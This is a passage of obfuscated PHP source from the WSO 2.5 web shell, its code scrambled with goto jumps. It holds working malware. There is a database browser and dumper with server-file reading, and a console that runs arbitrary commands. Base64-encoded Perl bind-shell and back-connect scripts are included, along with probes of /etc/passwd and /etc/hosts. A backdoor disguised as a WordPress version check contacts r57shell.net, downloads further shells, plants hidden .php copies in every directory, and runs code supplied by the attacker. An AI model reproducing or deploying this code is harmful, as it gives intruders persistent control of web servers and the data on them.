COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "</textarea><br/><input type=submit value='Execute'>"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n["n"]})</small>") . "</nobr><br>"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto uEPKu; QW0Ku: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto ss2k2; epF3V: echo "</td></tr>"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "</table></form><br/>"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto HfqGV; wQooQ: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa<td><select name='type'><option value='mysql' "; goto XNXvh; L_VIT: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zzoGT; zzoGT: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto CgrPi; hq4SA: echo "</select>"; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } goto hq4SA; KKbSG: echo "<select name=sql_base><option value=''></option>"; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto urMgZ; NmhxL: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode(":", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql,_set_charset")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto hIi1_; hIi1_: $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); goto Vq5gq; RFQO1: return array("file" => implode("
", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto ytmal; ytmal: $this->query("drop table wso2"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";\xa
"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . ";\xa"; goto GZCGH; e85gZ: $this->query("SELECT * FROM `" . $table . "`"); goto XOdpv; A8Rtf: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "\xa ,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "pgsql": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("SELECT * FROM " . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["type"]); goto b5FFe; xAAjI: echo ">MySql</option><option value='pgsql' "; goto WqMW0; b5FFe: if (@$_POST["p2"] == "download") { goto q3uCo; dKSpy: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto SW_1d; SW_1d: if (empty($_POST["file"])) { goto UlEph; NKAxm: foreach ($_POST["tbl"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("ob_gzhandler", 4096); goto wxi0r; wxi0r: header("Content-Disposition: attachment; filename=dump.sql"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("Content-Type: text/plain"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["file"], "w")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["p2"]); goto eJ6NS; HVjKn: foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } goto V4cuJ; q3uCo: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto G1BTq; G1BTq: $db->selectdb($_POST["sql_base"]); goto dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["type"] == "mysql") { echo "selected"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto PvgFx; y9LP4: if (isset($_POST["p1"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["p1"] == "bpp") { goto OF3WF; SvfsQ: unlink("/tmp/bp.pl"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bp.pl") . "</pre>"; goto SvfsQ; P3N6B: $out = wsoEx("perl /tmp/bp.pl " . $_POST["p2"] . " 1>/dev/null 2>&1 &"); goto l42lD; OF3WF: cf("/tmp/bp.pl", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["p1"] == "bcp") { goto KdsjF; EYep1: unlink("/tmp/bc.pl"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bc.pl") . "</pre>"; goto EYep1; KdsjF: cf("/tmp/bc.pl", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("perl /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1>/dev/null 2>&1 &"); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo "<h1>Network tools</h1><div class=content>\xd
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>"; goto y9LP4; JZOTa: echo "</div>"; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "</form></div><script>d.cf.cmd.focus();</script>"; goto SJHUc; f8SjV: echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; goto RZ79V; qs3Ch: echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; goto qrzII; IWzV6: if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])); } goto nacH0; c_48E: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>"; goto qs3Ch; qrzII: foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } goto f8SjV; KpSEA: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["path"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto sM0UF; vbq6x: if (@$_GET["slince_golden"]) { goto TmOVZ; UCuri: if (function_exists("curl_init")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto kmEj4; TmOVZ: echo "<!-- //Silence is golden. -->"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["is"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["l"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["uri"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["l"])); } goto fi0K3; FBXXk: if (@$_GET["m"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("curl_init")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["m"] . "gagal.php"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("curl_init")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("curl_init")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto a3V7j; rOcio: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["REQUEST_URI"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . wsoPerms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . wsoPerms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . wsoPerms(@fileperms($f)) . "</font>"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); goto zEzgM; oKr71: if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } goto owg70; giF29: wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); goto V6Pow; o51U2: wsoSecParam("Open base dir", @ini_get("open_basedir")); goto giF29; m3Zin: wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); goto o51U2; owg70: if (function_exists("oci_connect")) { $temp[] = "Oracle"; } goto DQ0Hi; I0L0t: if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysqli_get_client_info() . ")"; } goto T3sY7; T3sY7: if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } goto oKr71; Kcf2h: echo "<h1>Server security information</h1><div class=content>"; goto deosI; GSa9X: echo "<br>"; goto Ppg7_; zA3JJ: wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); goto aO8HS; IbU7m: echo "</div>"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("Supported databases", implode(", ", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["os"] == "nix") { goto yzksH; Pr2du: if (!$GLOBALS["safe_mode"]) { goto tBdFD; b1GnC: wsoSecParam("Userful", implode(", ", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("Danger", implode(", ", $temp)); goto xDJbP; tBdFD: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "<br/>"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("Downloaders", implode(", ", $temp)); goto F15O4; M0R0C: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto nuthD; dOgcI: echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "<br/>"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
